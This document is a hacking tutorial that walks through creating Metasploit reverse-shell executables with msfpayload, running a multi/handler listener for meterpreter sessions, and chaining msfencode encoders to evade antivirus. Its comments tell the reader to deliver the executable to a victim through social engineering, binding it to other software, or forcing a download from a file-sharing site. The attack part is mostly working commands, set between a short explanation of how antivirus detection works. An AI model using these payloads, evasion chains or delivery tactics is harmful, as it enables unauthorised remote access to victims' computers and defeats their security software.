STAND ALONE BINARIES AND BYPASS ANTIVIRUS IN METASPLOIT
HI IM SEEKERTODAY I WILL EXPLAIN HOW TO CREATE STAND ALONE BINARIES IN METASPLOIT AND HOW TO AVOID DETECTION FROM ANTIVIRUS .
Before we perform an antivirus evasion, let’s look at how to create standalone Metasploit binary payloads with msfpayload. For starters, we’ll create a simple reverse shell that connects back to the attacker and spawns a command shell.
CREATING METASPLOIT BINARIES:-
1 seeker@bt# msfpayload windows/shell_reverse_tcp o
/// o options will give you all the options required for the particular payload///
2 seeker@bt#msfpayload windows/shell_reverse_tcp LHOST=192.168.57.78 LPORT=31337 X > /var/www/file.exe
//this command will create the working executable which you need to install in victim machine using social engineering or binding it with some executable software or uploading it on 4shared.com and forcing him to download the file from 4shared and many more ways///
Now we have a working executable, so we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen for reverse connections.
3 msf>use exploit/multi/handler
4 msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
5 msf exploit(handler) >show options
6 msf exploit(handler) >set LHOST 192.168.57.78
7 msf exploit(handler) >set LPORT 31337
8 msf exploit(handler) >exploit
///now after running the listener if your victim runs the executable file in his system then you will get the meterpreter shell of your victim.////
///BUT HERE THE MAJOR PROBLEM IS ANTIVIRUS WHICH WILL DETECT YOUR EXECUTABLE AS A VIRUS AND STOP ITS EXECUTION SO NOW WE NEED TO USE ENCODERS TO MAKE OUR EXE TO BE UNDETECTABLE /// EVADING ANITVIRUS DETECTION :-
Antivirus is always the big issue for the begineers and sometimes for the proffessional hackers but today i will teach u how to evade antivirus using encoders.But first we need to understand how antivirus works.
How Antivirus Works???
Anti-virus software typically uses two different techniques to accomplish this:
- Examining files to look for known viruses by means of a virus dictionary
- Identifying suspicious behavior from any computer program which might indicate infection
Virus dictionary approach
In the virus dictionary approach, when the anti-virus software examines a file, it refers to a dictionary of known viruses that have been identified by the author of the anti-virus software. If a piece of code in the file matches any virus identified in the dictionary, then the anti-virus software can then either delete the file, quarantine it so that the file is inaccessible to other programs and its virus is unable to spread, or attempt to repair the file by removing the virus itself from the file.
To be successful in the medium and long term, the virus dictionary approach requires periodic online downloads of updated virus dictionary entries. As new viruses are identified "in the wild", civically minded and technically inclined users can send their infected files to the authors of anti-virus software, who then include information about the new viruses in their dictionaries.
Suspicious behavior approach
The suspicious behavior approach, by contrast, doesn't attempt to identify known viruses, but instead monitors the behavior of all programs. If one program tries to write data to an executable program, for example, this is flagged as suspicious behavior and the user is alerted to this, and asked what to do.
Unlike the dictionary approach, the suspicious behavior approach therefore provides protection against brand-new viruses that do not yet exist in any virus dictionaries.
///OK NOW WE KNOW HOW ANTIVIRUS WORKS WE WILL NOW ENCODE OUR EXE TO CHANGE ITS SIGNATURE SO THAT WHEN ANTIVIRUS SCANS OUR FILE IT DOES NOT FIND ANY SIGNATURE IN THE DICTIONARY THAT MATCHES OUR FILE AND WE CAN BYPASS THE ANTIVIRUS///
ENCODING THE EXE:-
One of the best ways to avoid being stopped by antivirus software is to encode our payload with msfencode. Msfencode alters the code in an executable so that it looks different to antivirus software but will still run the same way.Msfencode encodes the original executable in a new binary. Then, when the executable is run, msfencode decodes the original code into memory and executes it.
1 seeker@bt#msfencode -h
/// see a list of msfencode usage options///
2 seeker@bt#msfencode -l
///For a list of encoder formats///
3 seeker@bt#msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 5
-t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /var/www/file.exe
///Here we have used five counts for shikata_ga_nai, feeding the code in raw format into two counts of alpha_upper encoding , which is then fed to another five counts of shikata_ga_nai ,followed by five counts of countdown encoding , before finally directing the output into the desired executable. We are using a total of 20 encoding loops in an attempt to circumvent the antivirus software.///
//NOW U CAN CHECK THAT WHETHER YOUR EXECUTABLE IS DETECTED BY ANTIVIRUS OR NOT IF STILL IT IS DETECTED THEN ENCODE IT IN SAME FORMAT BY USING MORE ENCODERS IN RAW FORMAT AND INCREASING COUNT///
Tutorial By Parvesh Janartha | King Metasploit | IT Security Consultant
